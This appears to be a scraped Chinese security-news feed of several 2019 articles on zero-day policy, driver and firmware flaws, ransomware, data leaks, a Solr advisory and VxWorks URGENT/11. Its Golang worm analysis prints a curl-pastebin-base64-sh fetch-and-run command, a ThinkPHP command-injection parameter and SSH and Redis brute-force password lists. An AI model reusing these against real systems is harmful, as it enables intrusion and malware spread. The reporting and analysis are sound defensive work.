美国国家安全局 (NSA)、中央情报局 (CIA) 和联邦调查局 (FBI) 均在找寻、购买和使用零日漏洞利用,该争议性行为招致了广泛批评。使用零日漏洞反黑罪犯,而不是报告给供应商以做修复,会令全体国民都无力面对可能发现或盗取这些零日漏洞的罪犯或外国间谍,因而让整个国家陷入危险境地。批评家称,政府的工作就是保护国民,理应坚持防御而不是主动攻击。

《漏洞公平裁决程序》(VEP),就是美国政府当前用来评估零日漏洞披露与否的机制。VEP 试图平衡攻击与防御,决断哪些安全漏洞应报告给供应商做修复,哪些应被囤积以作攻击用途。

黑客团伙“影子经纪人”( Shadow Brokers) 曾放出大量漏洞利用程序,其中就包括曾广为流行的“永恒之蓝” (EternalBlue),将政府应不应该囤积漏洞的问题推上了风口浪尖。影子经纪人据称隶属俄罗斯情报机构,盗取 NSA 黑客工具后将之放到了网上,免费供人下载使用。犯罪分子拿到这些强大的 NSA 网络武器后纷纷展开犯罪行动,所引发的混乱到现在都还有余波。

修复的问题比零日漏洞本身还大

零日漏洞固然迷人,但实际上其效力已不比当年。供应商发布了补丁未必意味着脆弱设备就已被修复。很多情况下,比如物联网设备之类的东西,零部件出厂时就有漏洞,然后从未得到修复。有时候是因为物理上无法修复这些设备。而如果从未部署到生产环境,供应商发布的安全补丁就毫无用处。

因此,无论攻击者是罪犯还是政府,往往旧日漏洞便已足够。很多情况下,持有零日漏洞利用的攻击者更倾向于不用零日漏洞,而走旧日漏洞路线,因为若用零日漏洞利用程序攻击有技术能力的防御者,很有可能将该零日漏洞暴露出来。因此,零日漏洞利用程序强大而又脆弱,尤其是部署在网络领域国家间秘密角力场上的时候。

9999.jpg

]]>
“螺丝刀”揭开严重安全漏洞 多厂商驱动程序及固件现提权问题 Sun, 18 Aug 2019 13:46:49 +0800 当前信息安全问题越来越突出了,自幽灵、熔断漏洞之后,计算机硬件漏洞逐渐成为信息安全研究人员的关注点。 近日一家名为Eclypsium的网络安全研究公司公布了一份报告,称超过20家公司都会收到其发现的名为“螺丝刀”漏洞的影响。

图片来自Eclypsium

简要报告中,该公司称驱动程序及固件的不安全问题非常普遍,包括华硕、华擎等主要的BIOS供应商及NVIDIA等的驱动程序中都发现了严重漏洞,而且更严重的是他们发现的易受攻击的驱动程序都经过了微软的认证,因此他们已经邀请微软提供包括将一直的问题驱动列入黑名单等方法防范此类漏洞。

具体来讲这些漏洞都允许驱动程序充当代理,以执行对硬件资源的高权限访问,例如对处理器和芯片组的I/O空间的读写访问等。这是一种权限提升,因为它可以将攻击者从用户模式(Ring 3)提权至操作系统的内核模式(Ring 0),这样恶意软件就会拥有更多的权限执行。而驱动程序中的漏洞会使恶意软件较为轻松的获取高等级权限。

作为演示,Eclypsium展示了如Slingshot攻击、LoJax恶意软件等方式攻击驱动或固件。如LoJax恶意软件可向受害设备的固件中安装恶意软件,并在整个操作系统安装过程中持续存在。

Eclypsium的发现不仅提醒了各硬件厂商需要对固件安全更加重视,而且也说明了即使驱动程序进行了签名也不代表安全。所以为应对这个问题,需要个硬件厂商积极推出更加安全的固件及驱动,同时用户也需要积极升级最新的固件以保证设备不受漏洞影响。

9999.jpg

]]>
最新安全报告:单反相机已成为勒索软件攻击目标 Sun, 18 Aug 2019 13:46:49 +0800 恶意勒索软件近年来已经成为计算机系统的主要威胁,在成功入侵个人电脑,医院、企业、机构和政府部门的系统之后就会进行加密锁定,只有用户交付一定的赎金才能解锁。不过现在安全研究人员发现了单反相机同样存在这项的安全风险。援引安全软件公司Check Point今天发布的一份报告,详细说明了如何在数码单反相机中远程安装恶意程序。研究人员Eyal Itkin发现,黑客可以轻易地在数码相机上植入恶意软件。

他表示标准化的图片传输协议是传递恶意软件的理想途径,因为它是未经身份验证的,可以与WiFi和USB一起使用。该报告中指出通过黑客可以在热门景点部署有风险的WiFi热点,只要单反连接到这些热点之后就能进行攻击,从而进一步感染用户的PC。

在一段视频中,Itkin展示了他如何通过WiFi入侵Canon E0S 80D并加密SD卡上的图像,以便用户无法访问它们。他还指出,相机对于黑客来说可能是一个特别有价值的目标:毕竟相机中可能会存在很大用户不想要删除的影像资料。而且在真正的勒索软件攻击中,黑客设定的赎金往往不会太高,因此很多人会愿意交付赎金来摆脱不便。

Check Point表示它在3月份披露了佳能的漏洞,并且两人于5月份开始工作以开发补丁。上周,佳能发布了安全公告,告诉人们避免使用不安全的WiFi网络,在不使用时关闭网络功能,并在相机上更新并安装新的安全补丁。

Itkin表示目前他们只对佳能设备进行了测试,但是他告诉The Verge:“由于协议的复杂性,我们还认为其他供应商也可能容易受到这种攻击,但这取决于他们各自的实施情况。”

9999.jpg

]]>
纽约市消防局丢失载有员工医疗记录和社会保险号的硬盘 Sun, 18 Aug 2019 13:46:49 +0800 纽约市消防局(FDNY)披露了2019年3月发生的“数据泄露”。与其他数据泄露事件(通常涉及未经授权的一方利用易受攻击的网络)不同,FDNY的问题是由于一枚可移动硬盘丢失造成的。根据纽约市官员发布的声明,这一驱动器属于一名被授权访问该信息的员工。

市政官员称,丢失的可移动硬盘包含了超过10000名被FDNY EMS运输或治疗的个人信息,该信息由员工复制到驱动器中然后丢失,目前还不清楚驱动器是否已加密。

New_York_City_Fire_Department_Fire_Engines_(3926792185).jpg

除了医疗记录外,FDNY表示,硬盘包含3000名患者的社会保险号码,使他们面临身份盗窃的风险。不过截止发稿时,FDNY表示没有证据表明硬盘上的数据已经受到读取并产生损害后果。

最坏情况下,共有10253名患者可能因丢失的硬盘而受到损害,作为补救措施,纽约市的官员正在为3000名社会安全号码位于驱动器上的个人提供免费信用监控,并大约10000名受邮件影响的人发出通知。

这些医疗记录涵盖了从2011年到2018年由FDNY运送或治疗的患者,任何可能受数据丢失影响的人如果对此事有疑问,可以使用免费电话(877)213 -1732与当地官员联系。

9999.jpg

]]>
Golang蠕虫泛滥?让我们揪出其始作俑者 Sun, 18 Aug 2019 13:46:49 +0800 概述 

近日,国外安全网站SECURITYWEEK披露,一款Go语言恶意软件正大量感染Linux服务器,其使用了多达6种传播感染方式,包含4个远程执行漏洞(ThinkPHP、THinkPHP2、Dural、Confluence),2个弱密码爆破攻击(SSH、Redis)。深信服安全团队对该蠕虫进行了追踪。

image001.png

目前为止,恶意软件较少会使用Go语言编写,这是由于依赖库的原因,编译出来的程序较为冗余,如下通过VT可以得知,该样本有近9M那么大。然而,使用Go语言也有一个好处,就是易于集成第三方的库。

image003.png

逆向分析

对该样本进行反汇编,可以清晰地看到漏洞攻击对应的函数,其中Attack函数是主函数,依次调用getip和checkPort,来搜索同网段在线的主机IP,以及其开放端口,若发现有22、6379端口开放,则对其进行弱密码爆破;若发现有80端口,则对其进行漏洞扫描及攻击。

image005.png

1、CVE_2019_3396

CVE_2019_3396是Confluence的漏洞,攻击exp如下,将payload存储于_template参数中。

image007.png

2、Drupal

Drupal的攻击exp如下,对应的CVE编号为CVE-2018-7600。

image009.png

3、ThinkPHP

ThinkPHP有两个漏洞利用,下面这个是CVE-2019-9082漏洞,使用function=call_user_func_array&vars[0]=system&vars[1][]=URL利用该漏洞执行命令。

image011.png

4、ThinkPHP2

另一个漏洞利用跟上面的相似,攻击exp如下。

image012.jpg

5、Redis爆破

Redis登陆不需要用户名,爆破会使用如下几个弱密码:admin、redis、root、123456、password、user、test。登陆成功后,蠕虫会先调用FlushAll删除所有数据库,然后创建一个root数据库来存放恶意代码,该代码同样会被创建到/var/spool/cron和/etc/cron.d中以实现持久化潜伏。

image015.png

插入的是下面这个恶意代码,这个代码的意思是,每隔一分钟,就解密执行一次https://pastebin.com/raw/xvfxprtb的代码。

image017.png

6、SSH爆破

SSH爆破使用的用户名为:root、admins、user、test,密码分别为:admins、root、test、user、123456、password。

从上面几个漏洞攻击和密码爆破的方式来看,攻击最后的目的都是为了执行命令:’curl -fsSLhttps://pastebin.com/raw/xvfxprtb) | base64 -d) | sh’,所以,这个url的代码应该就是攻击的核心代码。pastebin.com/raw/xvfxprtb的代码如下,是经过base64加密的。

image019.png

解密后可以看见其主要操作,将m.jianlistore.com/images/qrcode/1414297564.jpg保存为本地的/tmp/.mysqli/mysqlc并执行,这个文件之前已经有文章分析过了,不再累赘:https://www.freebuf.com/articles/terminal/206170.html

image021.png

事件追踪

回到刚刚的网址:pastebin.com/raw/xvfxprtb,对其进行追踪,将网址中的raw去掉,就可以看到该代码的发布者了,从下图中可以得知,该作者为NIDAYE222,代码是6月10号上传的,访问量迄今为止为18000+,说明该蠕虫的感染量大概也是这个数,感染数量也还在极速上升。

image023.png

使用搜索引擎搜索nidaye222,可以发现,发布者在14天刚创建了个github账户,而在6月26号和30分别fork了漏洞扫描器kunpeng和开源挖矿xmrig,看来这个蠕虫的作者很有可能是从这得到了启发。

image025.png

Kunpeng是一个开源的POC检测框架,也是使用go语言进行编写的,所以,不排除作者有复用其中漏洞利用代码的可能性。

image027.png

Kunpeng目前为止收录了85个漏洞POC,其中也包含了该蠕虫所利用的漏洞,可想而知,只要作者愿意,他可以继续扩充如下漏洞攻击代码到蠕虫中去,所以,大家尽量打上相应的漏洞补丁,防止感染该病毒。

image029.png

9999.jpg

]]>
技术人员发现​数百个暴露的亚马逊云备份快照泄露了客户的数据 Sun, 18 Aug 2019 13:46:49 +0800 如果您使用了亚马逊的Elastic Block Storage快照,则可能需要评估一下数据安全。刚刚在Def Con安全会议上发布的新研究揭示了公司、初创公司和政府机构如何无意中从云中泄露自己的文件。那些在亚马逊托管的存储服务器,其中包含重要数据但经常配置错误,并且无意中设置为“公共”以供任何人访问,这不是什么新闻。但是,您可能没有听说过暴露的EBS快照,这会带来额外的风险。

这些看似不重要的弹性块存储(EBS)快照是就是问题所在,网络安全公司Bishop Fox的高级安全分析师Ben Morris表示,EBS快照存储云应用程序的所有数据,足以访问到有用的信息。

一般用户在丢弃计算机硬盘前会清空数据,但这些公共EBS卷因为同时面向不同的客户,再加上云管理员经常不选择正确的配置,使EBS快照无意中公开并且未加密。 “这意味着互联网上的任何人都可以下载你的硬盘并将其连接到他们控制的机器上,然后开始通过磁盘搜索任何类型的秘密,”他说。

一份Morris的Def Con幻灯片解释了如何展示EBS快照。

Morris使用亚马逊自己的内部搜索功能构建了一个工具,用于查询和抓取公开暴露的EBS快照,然后加载它,制作副本并列出其系统上卷的内容。这意味着,如果系统管理员的设置不当,只需要将磁盘曝光几分钟,研究人员就足以拿到一份快照文档,从而还原出云存储中数据的本来面目。

另一张幻灯片记录了使用他的研究发现的受损数据的类型,他用了两个月的时间建立了一个暴露数据数据库,花了几百美元用于亚马逊云资源。不过,他是专业的安全人员,并不会去利用这些数据,一旦他验证了快照可以被提取,就会删除数据。

Morris在一个地区发现了几十份公开的快照,包括应用程序密钥,关键用户或管理凭据,源代码等等,数据涉及几家大公司,包括医疗保健提供商和科技公司。

他还在快照中发现了虚拟专有网配置文件,这可以让他进入企业网络,当然他并没有利用这些数据做访问验证,因为这是违法的。

最具破坏性的内容当属一个政府承包商的快照,他没有透露机构名称,但他们确实为联邦机构提供了数据存储服务,数据中包含收集的对外情报,以及有关边境口岸的数据。“这些是我绝对不希望暴露在公共互联网上的东西。”

研究人员估计所有亚马逊云地区的数据暴露事件可能多达1250次。莫里斯计划在未来几周内发布他的概念证明代码。

9999.jpg
]]>
CVE-2019-0193:Apache Solr远程执行代码漏洞预警 Sun, 18 Aug 2019 13:46:49 +0800 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。Apache Solr 中存储的资源是以 Document 为对象进行存储的。每个文档由一系列的 Field 构成,每个 Field 表示资源的一个属性。——百度百科

2019年8月1日,Apache Solr公布了最新漏洞CVE-2019-0193预警,漏洞影响评级为严重。 此漏洞存在于可选模块DataImportHandler中,该模块主要负责从数据库或其他源提取数据,使用者可以通过外部请求中的dataConfig参数设置DIH模块配置。且由于DIH配置可以包含脚本,因此存在安全风险。从Solr的8.2.0版开始,要激活此参数需要将Java System属性“enable.dih.dataConfigParam”设置为true。

攻击者可以使用dataConfig参数构建远程代码执行的恶意请求。所有用户需尽快将Solr升级到最新版本,确保不受漏洞影响。

1.png

分布概况

目前FOFA系统最新数据(一年内数据)显示全球范围内共有8910个Solr服务。美国使用数量最多,共有3322个,中国第二,共有1411个,德国第三,共有804个,爱尔兰第四,共有440个,法国第五,共有301个。

china.png

中国地区中浙江省使用用数量最多,共有752个;北京市第二,共有260个,广东省第三,共有63个,江苏省市第四,共有41个,上海市第五,共有28个。

world.png

受影响的版本

  • Apache Solr <8.2.0

该漏洞利用条件苛刻,预计全球范围内受影响的服务较少。

CVE编号

CVE-2019-0193

修复建议

将Apache Solr升级到版本8.2.0或更高版本。

临时修补建议:

  • 确保可信来源与Solr通信,尤其是与DIH请求处理程序相关的通信。

参考链接

https://issues.apache.org/jira/browse/SOLR-13669
https://meterpreter.org/cve-2019-0193-apache-solr-remote-code-execution-vulnerability/

9999.jpg

]]>
Globelmposter勒索病毒变种家族史,看这篇就够了 Sun, 18 Aug 2019 13:46:49 +0800 群里朋友发来一条求助信息,问是中了哪个家族的勒索病毒,后面发来了相关的勒索病毒勒索信息和样本,经过确认为Globelmposter4.0变种家族,笔者跟踪分析过不少勒索病毒家族,最近一两年针对企业的勒索病毒攻击,真的是越来越多了,基本上每天都会不同的朋友通过微信或公众号咨询我,求助勒索病毒相关的信息,同时很多朋友在后台给我留言关于勒索病毒的相关信息和样本,感谢大家的信任与支持,也欢迎更多的朋友给我提交关于勒索病毒的相关信息和样本,一起研究对抗勒索病毒攻击。

针对企业的勒索病毒攻击在最近一段时间暴涨,此前我在公众号了发表过一篇文章《勒索不断!勒索病毒数量第二季度暴涨三倍》,目前国内外主要流行的几大勒索病毒家族分别是:Sodinokibi、GandCrab、Ryuk、Phobos、Globelmposter、CrySiS(Dharma)、CryptoMix、Paradise等,今天给大家分享一下Globelmposter这款勒索病毒家族的一些信息。

Globelmposter勒索病毒首次出现是在2017年5月份,主要通过钓鱼邮件进行传播,2018年2月国内各大医院爆发Globelmposter变种样本2.0版本,通过溯源分析发现此勒索病毒可能是通过RDP爆破、社会工程等方式进行传播,此勒索病毒采用RSA2048加密算法,导致加密后的文件无法解密。

Globelmposter2.0使用的加密后缀列表为:TRUE、FREEMAN、CHAK、TECHNO、DOC、ALC0、ALC02、ALC03、RESERVE、GRANNY、BUNNY+、BIG、ARA、WALKER、XX、BONUM、DONALD、FOST、GLAD、GORO、MIXI、RECT、SKUNK、SCORP、TRUMP、PLIN等,生成的超文本HTML勒索信息文件how_to_back_files.html,如下所示:

后面出现Globelmposter2.0变种使用的加密后缀列表为:

{killbillkill@protonmail.com}VC、{travolta_john@aol.com}ROCK

{travolta_john@aol.com}GUN、{colin_farel@aol.com}XX

{saruman7@india.com}.BRT92、[i-absolutus@bigmir.net].rose、

[lightright@bigmir.net].ransom、[bensmit@tutanota.com]_com

{jeepdayz@aol.com}BIT、{mixifightfiles@aol.com}BIT

{baguvix77@yahoo.com}.AK47、{colin_farel@aol.com}BIT

{legosfilos@aol.com}BIT、{lxgiwyl@india.com}.AK47

{omnoomnoomf@aol.com}BIT

生成的超文本勒索信息文件how_to_back_files.html,勒索背景采用红蓝两种模式,如下所示:

2019年5月份出现Globelmposter2.0最新的一款变种,代码与之前的Globelmposter2.0基本相似,使用的加密后缀列表为:

{HulkHoganZTX@protonmail.com}ZT

Killserver@protonmail.com}KSR

{CALLMEGOAT@PROTONMAIL.COM}CMG

{Killback@protonmail.com}KBK

生成的超文本勒索信息文件decrypt_files.html,如下所示:

2018年8月份此勒索病毒出现Globelmposter3.0变种样本,再次大范围攻击国内多个政企事业单位,Globelmposter3.0采用了十二生肖英文名+4444的加密后缀,列表如下所示:

Ox4444、Snake4444、Rat4444、

Tiger4444、Rabbit4444、Dragon4444、

Horse4444、Goat4444 、Monkey4444 、

Rooster4444 、Dog4444 、Pig4444

所以Globelmposter3.0勒索病毒俗称”十二生肖勒索病毒”,生成的勒索信息文件变成了文本文件HOW_TO_BACK_FILES.txt,如下所示:

2019年1月份出现了一款新型的Globelmposter勒索病毒,称为Globelmposter4.0,此勒索病毒加密后缀为fuck等,生成的勒索信息超文本文件README_BACK_FILES.htm,如下所示:

2019年3月出现了此勒索病毒的变种,称为Globelmposter4.0变种,加密后缀为:auchentoshan、makkonahi,生成的勒索信息为超文本文件how_to_open_files.html,如下所示:

后面又捕获到了它的一款变种,代码基本一致,勒索信息仍然为how_to_open_files.html,如下所示:

最新的Globelmposter5.0变种版本为Globelmposter十二主神版,它采用了古希腊宗教中最受崇拜的十位主神+666的加密后缀,加密后缀列表,如下所示:

Ares666、Zeus666、Aphrodite666、Apollon666、Poseidon666、Artemis666、Dionysus666、Hades666、Persephone666、Hephaestus666、Hestia666、Athena666,生成的勒索信息文本文件HOW TO BACK YOURFILES.txt,如下所示:

此前全球最流行的勒索病毒是GandCrab,然而这款勒索病毒算是国内最流行的勒索病毒了,已经有不少企业中招,变种非常频繁,很活跃,笔者曾分析过这款索病毒的十几个不同的版本,这里只列举出几个比较大的而且流行的版本,很遗憾的是这款勒索病毒从2.0版本开始就无法解密,目前也没有哪个机构或组织公布这款勒索病毒的解密工具

9999.jpg

]]>
VxWorks面临严重RCE攻击风险 Sun, 18 Aug 2019 13:46:49 +0800 *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担

概述

Armis研究团队在VxWorks中发现了11个零日漏洞,VxWorks可能是使用的最广泛的操作系统。 VxWorks被超过20亿台设备使用,包括关键的工业,医疗和企业设备。

被称为“URGENT/11”的漏洞存在于VxWorks的TCP / IP堆栈(IPnet)中,影响自6.5版本以来的所有版本。但不会影响安全认证产品版本–VxWorks 653和VxWorks Cert Edition。

其中六个漏洞被归类为关键漏洞并可远程执行代码(RCE)。其余漏洞为拒绝服务,信息泄露、逻辑缺陷。 URGENT/11被攻击会造成很严重影响,因为它使攻击者能够接管用户设备,甚至可以绕过防火墙和NAT等安全设备。导致攻击者可以将恶意软件传播到网络内部中去。这种攻击威力极大,类似于EternalBlue漏洞,可用于传播WannaCry恶意软件。

建议运行VxWorks设备的制造商检查公司安全中心发布的Wind River Security Alert中的最新更新,并立即对其进行修补。有关URGENT/11漏洞的完整技术细节可以在URGENT/11技术白皮书中找到。

VxWorks:实时操作系统

VxWorks是世界上使用最广泛的实时操作系统(RTOS)。 RTOS由需要高精度和可靠性的设备使用,例如关键基础设施,网络设备,医疗设备,工业系统甚至航天器。因此,VxWorks有非常广泛的用途,从PLC到MRI机器,到防火墙和打印机,再到飞机,火车等等。 VxWorks设备还包括西门子,ABB,Emerson Electric, Rockwell,三菱电子,三星,Ricoh, Xerox, NEC和Arris等。

VxWorks于1987年首次发布,是目前仍在广泛使用的最成熟的操作系统之一,由于其运行的设备的性质以及升级困难而维护了大量版本。尽管是传统的RTOS,但只有少数漏洞被发现,没有一个像URGENT/11严重。研究表明, VxWorks的内部工作方式仍处于不明确的状态,其缺陷也是如此,导致了严重的URGENT/11漏洞。其次,RTOS是由许多关键设备使用,使得在其中发现的漏洞会更具有影响力。

URGENT/11影响

URGENT/11对目前使用所有VxWorks连接的设备构成重大风险。 有三种攻击方案,具体取决于网络设备位置和攻击者位置。 攻击者可以使用URGENT/11来控制位于网络周边或内部的设备。 即使是远程登的设备也可受到攻击并被接管。 或者已经渗透到网络内部的攻击者可以使用URGENT/11来定位其中特定设备,也可以通过广播同时接管网络中所有受影响的VxWorks设备。

在所有情况下,攻击者都可以远程完全控制目标设备,无需用户交互,区别仅在于攻击者如何到达目标设备。

场景1——攻击网络防御设备

第一个攻击情形是攻击网络边界的VxWorks设备,例如防火墙,这些设备可以直接从Internet进行攻击。使用URGENT / 11漏洞,攻击者可以对这些设备直接发起攻击,并对其完全控制,然后穿透到内部网络。

根据Shodan搜索,有超过80万的SonicWall防火墙连接到互联网,表示这些设备正在防护相似数量的内部网络。使用URGENT / 11和Internet连接,攻击者可以使用特制的TCP数据包发起直接攻击,并立即控制所有防火墙,形成的僵尸网络规模几乎无法衡量,其内部网络也会遭到破坏。

场景2 – 从网络外部攻击绕过安全防护

第二种攻击情形会影响任何具有外部网络连接的VxWorks设备,攻击者能够接管此类设备,无论在网络外围实施任何防火墙或NAT都难以抵御攻击。

攻击示例:对安全网络(例如Xerox打印机)内连接到云的IoT设备进行攻击。打印机不直接暴露于Internet,因为它受防火墙和NAT的保护。攻击者可以拦截打印机与云的TCP连接,并触发打印机上的URGENT / 11 RCE漏洞,最终完全控制它。一旦攻击者接管了网络中的设备,就可以横向扩散,控制其他VxWorks设备,如下一个攻击情形所述。

场景3 – 从网络内部进行攻击

在这种情况下,攻击者已经可控目标网络内的VxWorks设备。对网络内其他VxWorks设备的攻击时,攻击者不需要目标设备的任何信息,因为URGENT / 11允许在整个网络中广播恶意数据包,攻击者可以通过广播数据包攻击所有存在漏洞的设备。

攻击示例:医院中的患者监护仪。它没有连接到互联网,但通过渗透网络,攻击者可以接管它。另一个例子是可编程逻辑控制器(PLC)。由于plc在受影响的VxWorks上运行,攻击者使用URGENT / 11漏洞可以在网络中广播攻击,并有效地控制整个工厂,无需任何前期信息收集工作。

技术细节

URGENT / 11是一组11个漏洞,它们会影响VxWorks的TCP / IP堆栈(IPnet)。其中六个漏洞被归类为关键漏洞并可远程执行代码(RCE)。其余漏洞分为拒绝服务,信息泄露或逻辑缺陷。由于每个漏洞都会影响网络堆栈的不同部分,因此会影响一组不同的VxWorks版本。

URGENT / 11是迄今为止VxWorks中发现的最严重的漏洞,在其32年的历史中仅有13个CVE。 URGENT / 11是一组独特的漏洞,允许攻击者绕过NAT和防火墙,并通过未检测到的TCP / IP堆栈远程控制设备,无需用户交互。

如前所述,URGENT / 11由11个漏洞组成,分为两类:

六个关键漏洞,允许远程执行代码

解析IPv4选项时堆栈溢出(CVE-2019-12256)

此漏洞可以由发送到目标设备的IP数据包触发,广播或多播数据包也会触发漏洞。该漏洞在处理IPv4标头中的IP选项时导致堆栈溢出,从而可以RCE。它不需要在设备上运行任何特定的应用程序或配置。

错误处理TCP的紧急指针字段而导致的四个内存损坏漏洞(CVE-2019-12255,CVE-2019-12260,CVE-2019-12261,CVE-2019-12263)

以下漏洞都源于错误处理TCP的紧急指针字段,该TCP字段很少出现在如今的应用程序中。攻击者可以通过直接连接到目标设备上的开放TCP端口,或者通过劫持目标设备的TCP连接来触发设备对该字段的错误处理。一旦触发,这些漏洞将导致目标设备上的应用程序从系统的recv()函数接收比预期更多的字节,从而导致内存损坏。

由于紧急指针字段是TCP的内置功能,因此路由器,NAT甚至防火墙会完整地传输它。即使数据通过多个路由器,NAT和防火墙设备仍然可被攻击者劫持并用于触发漏洞。

影响不同VxWorks版本的四种变体:

1、TCP紧急指针 ‘= 0’ 导致整数下溢(CVE-2019-12255),影响VxWorks版本6.5到6.9.3。

2、由于TCP AO选项格式错误(CVE-2019-12260)导致TCP紧急指针状态混淆,影响VxWorks版本6.9.4及更高版本。

3、TCP由于竞争条件引起的紧急指针状态混乱(CVE-2019-12263),影响VxWorks版本6.6及更高版本。

4、连接到远程主机(CVE-2019-12261)时TCP紧急指针状态混淆,影响VxWorks版本6.7及更高版本。

DHCP Offer / ACK解析中的堆溢出(CVE-2019-12257)

此漏洞是易受攻击的设备分析特定DHCP响应数据包时触发的堆溢出漏洞。当它尝试从DHCP服务器获取IP地址时,这些数据包由ipdhcpc(VxWorks的内置DHCP客户端)解析。与目标设备位于同一子网中的攻击者可以等待它发送DHCP请求,并使用特制的DHCP响应快速回复。在这种情况下,等待来自网络的原始DHCP服务器的响应的目标设备很容易被攻击者欺骗,并解析特制的DHCP响应消息,导致攻击者可远程代码执行。此漏洞影响VxWorks版本从6.5到6.9.3。

导致拒绝服务,信息泄露或某些逻辑缺陷的五个漏洞

利用格式错误的TCP选项进行TCP连接DoS(CVE-2019-12258)

此漏洞影响VxWorks 6.5及更高版本,并允许对受影响的VxWorks设备任何TCP连接进行拒绝服务攻击。可以通过使用现有连接的4元组发送包含某些TCP选项的特制TCP数据包来触发此漏洞,但不知道该连接的序列号,从而导致TCP连接断开。

处理未经请求的反向ARP回复(逻辑缺陷)(CVE-2019-12262)

此漏洞是影响VxWorks 6.5及更高版本的逻辑错误,可以允许同一子网上的攻击者通过未经请求的RARP回复数据包向目标设备添加多个IPv4地址。这将破坏目标设备的路由表,可能导致其使用的应用程序拒绝服务。多次触发此漏洞也会导致内存耗尽,从而导致目标设备上的其他执行失败。

ipdhcpc DHCP客户端分配IPv4的逻辑缺陷(CVE-2019-12264)

此漏洞是VxWorks内置DHCP客户端(如果包含)(ipdhcpc)中的逻辑错误,该错误会影响VxWorks 6.5及更高版本。易受攻击的设备将接受DH分配给它的任何IPv4地址。

在IGMP解析中的DoS(CVE-2019-12259)

此漏洞是影响VxWorks 6.5及更高版本的拒绝服务漏洞,可能导致目标设在解析本地子网内的攻击者发送的未经身份验证的数据包时崩溃。

IGMP信息泄漏(CVE-2019-12265)

此漏洞是影响VxWorks版本6.9.3及更高版本的信息泄漏。可通过上述DHCP客户端漏洞(CVE-2019-12264)实现。要触发此漏洞,攻击者可以将分段的IGMPv3成员资格查询报告发送到目标设备,使目标数据包堆的信息泄漏,导致IGMPv3成员身份报告发送回攻击者。

受影响范围

URGENT / 11漏洞影响自6.5版以来的所有VxWorks版本,不包括认证产品版本,例如VxWorks 653和VxWorks Cert Edition。

受影响的设备的部分列表包括:

SCADA devices

Industrial controllers

Patient monitors

MRI machines

Firewalls

VOIP phones

Printers

除上述设备外,还有大量公开列表可识别哪些制造商使用VxWorks:

Wind River Customer Page

Wikipedia VxWorks Page

SlideShare

Online Presentations

医疗和工业部门可能面临风险

由于VxWorks常被工业和医疗行业使用,因此它们都处于极其严重的风险之中。 受损的工业控制器可能会导致关闭工厂,而监护仪受损会对生命造成威胁。

解决方案

VxWorks更新

使用VxWorks设备的组织和设备制造商应立即修补受影响的设备。更新和补丁信息可在公司安全中心发布的Wind River Security Alert中找到。

防火墙设置

1、检测对紧急指针的任何使用。在极少数情况下合法应用程序使用紧急指针会导致一些误报。

2、检测包含SYN,URG和FIN标志的数据包。 这种组合永远不会出现在合法的TCP流量中

3、检测包含LSRR或SSRR选项的任何IP数据包。

9999.jpg

]]>
球鞋转售平台StockX会员资料泄露,暗网标价300美元叫卖 Sun, 18 Aug 2019 13:46:49 +0800


记者 | 罗盈盈

早前刚获得1.1亿美元融资的StockX,不仅得到资本的青睐,最近还被黑客看上了。

美国媒体Footwear News报道称,近日,球鞋交易平台StockX对外证实,今年5月份公司遭遇黑客入侵,被窃取超过680万份会员资料,这些数据以300美元的价格在暗网上出售。

据悉,此次遭泄露的680万份会员资料中,包含用户名、E-mail帐号、非完整的密码组合、使用者偏好的球鞋尺码与使用的手机型号等。

StockX强调,用户的支付信息没有遭到任何泄露,但该平台发布邮件建议用户尽快修改自己的账户密码,尽量保障信息安全。

科技网站TechCrunch曾假扮买家向黑客索取详细内容,后者将1000份会员资料免费提供给 TechCrunch。随后,名单被交给StockX查证,并确认为该平台的会员资料。经证实,这些资料已经被售出。

与此同时,StockX表示公司正在调查中,目前还未有任何会员资料被盗用的案件。

但这家球鞋平台依然受到质疑——StockX被指责在黑客事件发生的第一时间,并未迅速告知用户,以尽快规避风险,相反选择瞒报此事,并在早前以“系统升级”为由要求用户修改密码。

时隔三个月,直至8月5日,StockX才正式以声明的方式承认入侵事件的存在。

“我们已经对可能涉及客户数据的可疑活动发出警告,展开全面的调查,并聘请第三方数据公司和专家协助。到目前为止,没有证据表明客户的财务或支付信息受到影响。出于谨慎考虑,我们立即对基础系统进行升级。”StockX在公开声明中写道。

过去三年里,美国球鞋交易平台StockX已经从初创公司,发展成为一家估值超10亿美元的独角兽企业。

StockX创立于 2016年2月,其前身为2012年成立的运动鞋数据Campless平台。与证券交易一样,运动鞋等商品的价格随着消费者的偏好而波动,整个平台的呈现形式和交易方式与股票交易相似。

StockX会根据商品类别的不同,向卖家收取商品交易总额9%至14%作为平台佣金。为了保护消费者的利益,StockX还会对商品进行专业鉴定。

这一球鞋转售模式,已经吸引众多投资者的目光。

今年6月底,StockX宣布完成价值1.1亿美元的C轮融资,这笔资金的注入使这家年轻公司的估值进一步扩大。C轮融资由新投资者DST Global牵头,还包括成立于1980年的投资公司General Atlantic以及风险投资GGV capital。

截至目前,StockX累计募集达到1.6亿美元的风险资本。

创立早期,StockX的业务主要以美国本土为主。直至今年,公司利用新募集的资金,开始积极开拓欧洲市场。近期,StockX联合创始人Josh Luber透露未来发展计划时表示,2019年末,公司将拓展中国和日本市场。

9999.jpg

]]>
Steam被曝出0day提权漏洞,但厂商拒绝修复 Sun, 18 Aug 2019 13:46:49 +0800 22.png

近期,全球流行的Steam游戏客户端被曝出0day提权漏洞,影响全球一亿多Steam用户。该漏洞可让机器上的低权限用户以SYSTEM权限运行程序。这意味着恶意软件很可能利用这个漏洞对受害者的机器进行深度破坏。

考虑到Steam是一款总用户1.2亿,日常在线用户3百多万,并时刻有大量新用户加入使用的软件,预计这个漏洞将对全球游戏用户产生深远影响。

33.jpg

权限升级

在Valve(Steam的厂商)不认领该漏洞后,两位研究人员公开了这个漏洞的详细信息。有意思的是,虽然Valve并不承认这个漏洞,更不会给予赏金或修复它,但却告诉研究人员不能公开漏洞细节。

安全研究员Felix于近期发布了一份分析报告,着重分析了一个与Steam相关的Windows服务,名为Steam Client Service,它是以SYSTEM权限在Windows上运行。研究人员还注意到,这个服务可以由“Users”用户组进行启动或停止,这个“Users”用户组几乎包含任何登录过计算机的角色。

但是,这个服务的注册表项不能由“User”用户组写入。因此,从表面上看,攻击者是无法从“Users”用户组提升至SYSTEM权限。

